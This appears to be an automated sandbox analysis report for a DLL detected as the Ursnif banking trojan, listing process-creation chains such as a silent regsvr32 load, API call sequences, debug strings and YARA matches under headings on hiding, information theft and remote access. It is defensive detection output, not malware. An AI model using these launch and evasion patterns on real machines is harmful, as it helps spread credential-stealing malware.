            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ~ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: } .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: | .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: { .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ` .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: _ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ^ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ] .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: [ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: classification engineClassification label: mal84.bank.troj.winDLL@13/132@10/4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026F5946 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_026F5946
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026F5946 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_026F5946
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{99EDD371-2A2D-11EB-90EB-ECF4BBEA1588}.datJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{99EDD371-2A2D-11EB-90EB-ECF4BBEA1588}.datJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF3B007EC7DDA32009.TMPJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF3B007EC7DDA32009.TMPJump to behavior
            Source: 0pz1on1.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: 0pz1on1.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 0pz1on1.dllVirustotal: Detection: 12%
            Source: 0pz1on1.dllVirustotal: Detection: 12%
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\0pz1on1.dll'
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\0pz1on1.dll
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:82952 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17436 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\0pz1on1.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:82952 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17436 /prefetch:2Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\0pz1on1.dll'
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\0pz1on1.dll
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:82952 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17436 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\0pz1on1.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:82952 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17436 /prefetch:2Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: 0pz1on1.dllStatic PE information: More than 130 > 100 exports found
            Source: 0pz1on1.dllStatic PE information: More than 130 > 100 exports found
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: 0pz1on1.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 0pz1on1.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: P:\redeemeress\rinch\unheroize\dipping\bushbuck.pdb source: 0pz1on1.dll
            Source: Binary string: (+A:\rewind.pdb6=Y(l|5f source: 0pz1on1.dll
            Source: Binary string: (+A:\rewind.pdb source: 0pz1on1.dll
            Source: Binary string: U:\unchance\symmetrization\umbrageously\eighteenfold\enzymolysis.pdb source: 0pz1on1.dll
            Source: Binary string: P:\redeemeress\rinch\unheroize\dipping\bushbuck.pdbxMAjt source: 0pz1on1.dll
            Source: Binary string: P:\veneracea\flump\emptyhearted\mashpee\urataemia.pdb source: 0pz1on1.dll
            Source: Binary string: S:\ameiuridae.pdb source: 0pz1on1.dll
            Source: Binary string: P:\veneracea\flump\emptyhearted\mashpee\urataemia.pdby\ source: 0pz1on1.dll
            Source: Binary string: G:\zattare\unbroadcasted\beanstalk\pseudogenus\urochrome\platysmamyoides.pdb source: 0pz1on1.dll
            Source: Binary string: T:\gainage\amalgamationist\hydrosorbic\rattletrap\allopathic\knublet\refrangible\heteromya\polysemeia.pdb source: 0pz1on1.dll
            Source: Binary string: P:\redeemeress\rinch\unheroize\dipping\bushbuck.pdb source: 0pz1on1.dll
            Source: Binary string: (+A:\rewind.pdb6=Y(l|5f source: 0pz1on1.dll
            Source: Binary string: (+A:\rewind.pdb source: 0pz1on1.dll
            Source: Binary string: U:\unchance\symmetrization\umbrageously\eighteenfold\enzymolysis.pdb source: 0pz1on1.dll
            Source: Binary string: P:\redeemeress\rinch\unheroize\dipping\bushbuck.pdbxMAjt source: 0pz1on1.dll
            Source: Binary string: P:\veneracea\flump\emptyhearted\mashpee\urataemia.pdb source: 0pz1on1.dll
            Source: Binary string: S:\ameiuridae.pdb source: 0pz1on1.dll
            Source: Binary string: P:\veneracea\flump\emptyhearted\mashpee\urataemia.pdby\ source: 0pz1on1.dll
            Source: Binary string: G:\zattare\unbroadcasted\beanstalk\pseudogenus\urochrome\platysmamyoides.pdb source: 0pz1on1.dll
            Source: Binary string: T:\gainage\amalgamationist\hydrosorbic\rattletrap\allopathic\knublet\refrangible\heteromya\polysemeia.pdb source: 0pz1on1.dll
            Source: 0pz1on1.dllStatic PE information: real checksum: 0x249a3 should be: 0x2c1a4
            Source: 0pz1on1.dllStatic PE information: real checksum: 0x249a3 should be: 0x2c1a4
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\0pz1on1.dll
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\0pz1on1.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_021921C3 push ecx; ret 1_2_021921D3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_02192170 push ecx; ret 1_2_02192179
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026FAEDB push ecx; ret 1_2_026FAEEB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026FAB20 push ecx; ret 1_2_026FAB29
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_021921C3 push ecx; ret 1_2_021921D3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_02192170 push ecx; ret 1_2_02192179
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026FAEDB push ecx; ret 1_2_026FAEEB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026FAB20 push ecx; ret 1_2_026FAB29

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.709938495.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.710009927.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709960999.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709897369.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.710074481.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.925636434.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709991832.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709847934.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.710050270.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6944, type: MEMORY
            Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1320Thread sleep count: 173 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1320Thread sleep time: -86500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1320Thread sleep count: 173 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1320Thread sleep time: -86500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026F523B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_026F523B
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026F523B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_026F523B
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
            Source: regsvr32.exe, 00000001.00000002.925442515.0000000002B70000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: regsvr32.exe, 00000001.00000002.925442515.0000000002B70000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000001.00000002.925442515.0000000002B70000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: regsvr32.exe, 00000001.00000002.925442515.0000000002B70000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: regsvr32.exe, 00000001.00000002.925442515.0000000002B70000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: regsvr32.exe, 00000001.00000002.925442515.0000000002B70000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000001.00000002.925442515.0000000002B70000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: regsvr32.exe, 00000001.00000002.925442515.0000000002B70000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026F65CE cpuid 1_2_026F65CE
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026F65CE cpuid 1_2_026F65CE
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_02191006 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,1_2_02191006
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_02191006 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,1_2_02191006
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026F65CE RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,1_2_026F65CE
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026F65CE RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,1_2_026F65CE
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_021910D8 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,1_2_021910D8
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_021910D8 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,1_2_021910D8

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.709938495.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.710009927.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709960999.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709897369.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.710074481.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.925636434.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709991832.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709847934.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.710050270.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6944, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.709938495.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.710009927.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709960999.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709897369.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.710074481.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.925636434.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709991832.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
